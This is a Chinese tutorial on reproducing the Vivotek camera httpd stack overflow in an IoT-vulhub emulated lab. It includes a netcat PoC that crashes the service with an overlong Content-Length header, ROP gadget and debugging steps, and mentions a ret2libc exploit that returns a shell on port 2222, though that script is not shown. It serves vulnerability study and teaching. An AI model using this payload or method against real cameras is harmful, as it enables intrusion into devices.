Vivotek远程栈溢出漏洞复现教学文档<\/h1>

1. 漏洞概述<\/h2>
漏洞类型<\/strong>：远程栈溢出漏洞
影响服务<\/strong>：Vivotek摄像头固件中的httpd服务
漏洞成因<\/strong>：未对用户POST数据长度进行校验，导致攻击者可以发送超长数据造成栈溢出
影响<\/strong>：可导致摄像头进程崩溃或执行任意代码
发现时间<\/strong>：2017年11月<\/p>

2. 环境准备<\/h2>
2.1 基础环境安装<\/h3>
在Ubuntu 20.04下安装必要组件：<\/p>
# 安装pip<\/span> <\/span><\/span>curl -s https:\/\/bootstrap.pypa.io\/get-pip.py | python3 <\/span><\/span> <\/span><\/span># 安装最新版docker<\/span> <\/span><\/span>curl -s https:\/\/get.docker.com\/ | sh <\/span><\/span> <\/span><\/span># 启动docker服务<\/span> <\/span><\/span>systemctl start docker <\/span><\/span> <\/span><\/span># 安装docker-compose<\/span> <\/span><\/span>python3 -m pip install docker-compose <\/span><\/span><\/code><\/pre>2.2 获取IoT-vulhub项目<\/h3> wget https:\/\/github.com\/VulnTotal-Team\/IoT-vulhub\/archive\/master.zip -O iot-vulhub-master.zip <\/span><\/span>unzip iot-vulhub-master.zip &&<\/span> cd iot-vulhub-master <\/span><\/span><\/code><\/pre>2.3 构建基础镜像<\/h3> # 构建ubuntu1604基础镜像<\/span> <\/span><\/span>cd baseImage\/ubuntu1604 &&<\/span> docker build -t firmianay\/ubuntu1604 . <\/span><\/span> <\/span><\/span># 构建binwalk容器<\/span> <\/span><\/span>cd baseImage\/binwalk &&<\/span> docker build -t firmianay\/binwalk . <\/span><\/span><\/code><\/pre>3. 固件解压<\/h2> 使用binwalk解压Vivotek固件：<\/p> cd VIVOTEK\/remote_stack_overflow <\/span><\/span>docker run --rm -v $PWD\/firmware\/:\/root\/firmware firmianay\/binwalk -Mer "\/root\/firmware\/CC8160-VVTK-0100d.flash.pkg"<\/span> <\/span><\/span><\/code><\/pre>4. 环境搭建<\/h2> 4.1 解决镜像缺失问题<\/h3> 由于docker.io没有firmianay\/qemu-system:armel<\/code>镜像，需要本地构建：<\/p> 修改IoT-vulhub-master\/baseImage\/qemu-system\/armel\/images\/download.sh<\/code>中的下载链接为https:\/\/file.erlkonig.tech\/debian-armel\/xxxx<\/code><\/li> 运行download.sh下载所需文件<\/li> 在上级目录构建镜像：<\/li> <\/ol> docker build -t firmianay\/qemu-system:armel . <\/span><\/span><\/code><\/pre>4.2 解决构建错误<\/h3> 遇到构建错误时：<\/p> 注释掉关于gef的代码（调试时直接使用gdb）<\/li> 对于新版docker的文件名检测问题：找到要提取的带有_31<\/code>的目录到firmware目录下<\/li> 将命令改为：COPY .\/firmware\/_31.extracted \/root\/firmware<\/code><\/li> <\/ul> <\/li> <\/ol> 5. 漏洞分析<\/h2> 5.1 漏洞程序检查<\/h3> 检查httpd程序的安全机制：<\/p> checksec httpd <\/span><\/span><\/code><\/pre>结果：32位小端arm程序，仅开启NX保护<\/p> 5.2 IDA分析<\/h3> 关键漏洞点：<\/p> 程序截取Content-Length<\/code>字符串并使用strncpy<\/code>复制到dest变量<\/li> 未对字符串长度进行校验<\/li> dest变量距离栈底仅0x38字节，容易造成栈溢出<\/li> <\/ul> 6. 漏洞复现<\/h2> 6.1 启动环境<\/h3> # 启动系统环境<\/span> <\/span><\/span>docker compose -f docker-compose-system.yml up <\/span><\/span> <\/span><\/span># 启动用户环境<\/span> <\/span><\/span>docker-compose -f docker-compose-user.yml up <\/span><\/span> <\/span><\/span># 进入系统环境<\/span> <\/span><\/span>docker exec -it vivotek-system \/bin\/bash <\/span><\/span><\/code><\/pre>6.2 测试连接<\/h3> nc -v 192.168.2.2 80<\/span> <\/span><\/span># 或浏览器访问：http:\/\/127.0.0.1:8888<\/span> <\/span><\/span><\/code><\/pre>6.3 发送PoC<\/h3> echo -en "POST \/cgi-bin\/admin\/upgrade.cgi\r\nHTTP\/1.0\nContent-Length:AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n"<\/span> | nc -v 192.168.2.2 80<\/span> <\/span><\/span><\/code><\/pre>观察系统是否崩溃，验证漏洞存在。<\/p> 7. 漏洞利用<\/h2> 7.1 获取进程信息<\/h3> cat \/proc\/[<\/span>pid]<\/span>\/maps <\/span><\/span><\/code><\/pre>获取libc基地址和栈地址。<\/p> 7.2 查找ROP gadget<\/h3> ROPgadget --binary httpd --only 'pop|ret'<\/span> <\/span><\/span><\/code><\/pre>关键gadget：<\/p> pop {r1, pc}<\/code><\/li> mov r0, r1 ; pop {r4, r5, pc}<\/code><\/li> <\/ul> 7.3 调试设置<\/h3> 在测试虚拟机中：<\/p> .\/tools\/gdbserver --attach :8888 `<\/span>ps | grep -v grep | grep httpd | awk '{print $1}'<\/span>`<\/span> <\/span><\/span><\/code><\/pre>在攻击主机中：<\/p> gdb <\/span><\/span>target remote 192.168.2.2:8888 <\/span><\/span><\/code><\/pre>7.4 利用脚本<\/h3> 使用提供的脚本模板（位于.\/tools\/<\/code>目录），根据调试结果修改：<\/p> libc基地址<\/li> gadget地址<\/li> 栈布局<\/li> <\/ul> 7.5 执行利用<\/h3> 运行exp.sh脚本，通过2222端口反弹shell：<\/p> nc 192.168.2.2 2222<\/span> <\/span><\/span><\/code><\/pre>成功获取shell。<\/p> 8. 总结<\/h2> 漏洞原理<\/strong>：未校验输入长度导致栈溢出<\/li> 利用限制<\/strong>：仅NX保护，无ASLR<\/li> 利用方法<\/strong>：ROP链构造，ret2libc<\/li> 关键点<\/strong>：正确构建环境<\/li> 精确计算偏移<\/li> 选择合适的gadget<\/li> 调试确定内存布局<\/li> <\/ul> <\/li> <\/ol> 9. 防御建议<\/h2> 对所有输入进行长度校验<\/li> 启用ASLR保护<\/li> 使用栈保护机制（如canary）<\/li> 及时更新固件版本<\/li> <\/ol>